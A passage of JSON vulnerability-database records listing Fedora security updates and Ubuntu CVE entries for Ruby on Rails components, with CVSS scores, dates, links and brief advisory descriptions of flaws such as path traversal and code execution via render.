"obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2016-03-17T20:58:04", "id": "FEDORA:EB70F608B5E9", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/MXL5HL3OOP26J27KL65QCQBSGEOKRPV3/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Simple, battle-tested conventions and helpers for building web pages. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-03-17T21:23:47", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: rubygem-actionview-4.2.0-5.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2016-03-17T21:23:47", "id": "FEDORA:16C07609221C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/6XF27ZQZNQB6F64VC7KOFMRYRDJC3Z2K/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling easy unit/integration testing that doesn't require a browser. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-03-17T21:23:47", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: rubygem-actionpack-4.2.0-4.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2016-03-17T21:23:47", "id": "FEDORA:034186092201", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FDS6BW3RRN2GV3HFH52UACFJM5M7YT2R/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Simple, battle-tested conventions and helpers for building web pages. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-02-28T12:29:19", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: rubygem-actionview-4.2.3-3.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-02-28T12:29:19", "id": "FEDORA:10928605A0F3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/SHQXAHGKAFMP3R6F3JNE5XXQWDGVU4EP/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Simple, battle-tested conventions and helpers for building web pages. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-02-28T08:31:07", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: rubygem-actionview-4.2.0-3.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-02-28T08:31:07", "id": "FEDORA:C3F056065295", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/S5RF27PGZNPUXSYGAZWBXIWYNO537IWT/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Ruby on Rails is a full-stack web framework optimized for programmer happiness and sustainable productivity. It encourages beautiful code by favoring convention over configuration. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-rails-5.0.0.1-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:909536087ECC", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WAMEZEEF5UHZPV5IDQY4ZP5VLSRSFHY5/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "A toolkit for building modeling frameworks like Active Record. Rich support for attributes, callbacks, validations, serialization, internationalization, and testing. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-activemodel-5.0.0.1-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:837166087EC2", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JNY6ZLXQZ4GJM4L5Z2JD42S4WMYF75U5/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Rails internals: application bootup, plugins, generators, and rake tasks. Railties is responsible to glue all frameworks together. 
Overall, it: * handles all the bootstrapping process for a Rails application; * manages rails command line interface; * provides Rails generators core; ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-railties-5.0.0.1-2.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:335C96042D4E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JWPXPNMF2BDDQ7AGYMPNOYVDE3BN3RFG/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling easy unit/integration testing that doesn't require a browser. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-actionpack-5.0.0.1-2.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:072A56042D49", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/7SB36DN7LSLP2GHE4LNAQGWXRMHZEU5F/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Simple, battle-tested conventions and helpers for building web pages. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-actionview-5.0.0.1-2.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:2B7856042D4C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/INSRTFAYYUM2XLIWRMW2ZQBU6VNPXG6B/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Implements the ActiveRecord pattern (Fowler, PoEAA) for ORM. It ties database tables and classes together for business objects, like Customer or Subscription, that can find, save, and destroy themselves without resorting to manual SQL. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-activerecord-5.0.0.1-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:3C1406042D4F", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/5VQDB7AQ3WT2TSLDMYPYKXIMBJ7KYSJ6/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Structure many real-time application concerns into channels over a single WebSocket connection. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-actioncable-5.0.0.1-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:45DE46042D51", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XOQL7IU7SB6QJRWGKCHRPZQUOIURV63S/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Declare job classes that can be run by a variety of queueing backends. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-activejob-5.0.0.1-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:7E33C6042D49", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/R67FRLEDPZRRVMJS3A5LA6YIM5UQO4GY/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "A toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Rich support for multibyte strings, internationalization, time zones, and testing. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-activesupport-5.0.0.1-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:9D8B2608A217", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/MRQYAVBWV4UNQ5XC3LB5L44OYTI3JZ3W/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Email on Rails. Compose, deliver, receive, and test emails using the familiar controller/view pattern. First-class support for multipart email and attachments. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-27T11:11:22", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: rubygem-actionmailer-5.0.0.1-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2016-08-27T11:11:22", "id": "FEDORA:732356042D46", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/SVDJLLIW67K6FGDQKQEY6EGTKQ7KXRQU/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Utility library which carries commonly used classes and goodies from the Rails framework ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-02-28T08:31:16", "type": "fedora", "title": 
"[SECURITY] Fedora 22 Update: rubygem-activesupport-4.2.0-4.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2016-0753"], "modified": "2016-02-28T08:31:16", "id": "FEDORA:62D2F605A0F1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/M4DYD6QEGX3FGH5VZL7YPXI6SX52S5SJ/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:12:18", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before\n3.2.22.2 and 4.x before 4.1.14.2 allows remote attackers to read arbitrary\nfiles by leveraging an application's unrestricted use of the render method\nand providing a .. (dot dot) in a pathname. 
NOTE: this vulnerability\nexists because of an incomplete fix for CVE-2016-0752.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-04-07T00:00:00", "type": "ubuntucve", "title": "CVE-2016-2097", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097"], "modified": "2016-04-07T00:00:00", "id": "UB:CVE-2016-2097", "href": "https://ubuntu.com/security/CVE-2016-2097", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:12:56", "description": "The http_basic_authenticate_with method in\nactionpack/lib/action_controller/metal/http_authentication.rb in the Basic\nAuthentication implementation in Action Controller in Ruby on Rails before\n3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x\nbefore 5.0.0.beta1.1 does not use a constant-time algorithm for verifying\ncredentials, which makes it easier for remote attackers to bypass\nauthentication by measuring timing 
differences.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward precise_ruby-actionpack-2.3 -- documentation is buggy but doesn't contain an implementation itself.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-02-16T00:00:00", "type": "ubuntucve", "title": "CVE-2015-7576", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2016-02-16T00:00:00", "id": "UB:CVE-2015-7576", "href": "https://ubuntu.com/security/CVE-2015-7576", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:12:17", "description": "Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and\n4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code\nby leveraging an application's unrestricted use of the render method.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward\n", "cvss3": 
